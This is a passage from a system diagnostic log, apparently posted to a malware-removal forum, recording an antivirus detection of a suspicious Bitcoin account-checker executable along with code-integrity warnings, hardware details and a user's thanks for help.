file:_C:\$Recycle.Bin\S-1-5-21-230749707-3925018352-439227168-1001\$RMB6J1E\Checkers\Bonusbitcoin Accounts Checker By X-SLAYER.exe; file:_
Detection Origin: Local machine
Detection Type: Concrete
Detection Source: Real-Time Protection
Process Name: C:\Windows\svchost.com
Security intelligence Version: AV: 1.313.2035.0, AS: 1.313.2035.0, NIS: 1.313.2035.0
Engine Version: AM: 1.1.16900.4, NIS: 1.1.16900.4
CodeIntegrity:
===================================
Date: 2020-04-23 10:08:52.002
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:52.001
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:51.687
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:08:51.686
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Windows\System32\svchost.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Microsoft signing level requirements.
Date: 2020-04-23 10:07:27.749
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.749
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.627
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
Date: 2020-04-23 10:07:27.626
Description: 
Code Integrity determined that a process (\Device\HarddiskVolume4\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe) attempted to load \Device\HarddiskVolume4\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
==================== Memory info =========================== 
BIOS: American Megatrends Inc. A.A0 06/18/2019
Motherboard: Micro-Star International Co., Ltd. X470 GAMING PLUS (MS-7B79)
Processor: AMD Ryzen 5 2600 Six-Core Processor 
Percentage of memory in use: 49%
Total physical RAM: 16332.53 MB
Available physical RAM: 8251.76 MB
Total Virtual: 28620.53 MB
Available Virtual: 16095.94 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:446.5 GB) (Free:213.04 GB) NTFS
\\?\Volume{f1e9235f-570a-4ef7-bacb-83127ccb793d}\ (Recovery) (Fixed) (Total:0.52 GB) (Free:0.11 GB) NTFS
\\?\Volume{6e5438c6-b60e-4753-9678-dd64bf0a9dad}\ () (Fixed) (Total:0.09 GB) (Free:0.07 GB) FAT32
==================== MBR & Partition Table ====================
==================== End of Addition.txt =======================
Thank you so much for your help and hope to hear from you soon.
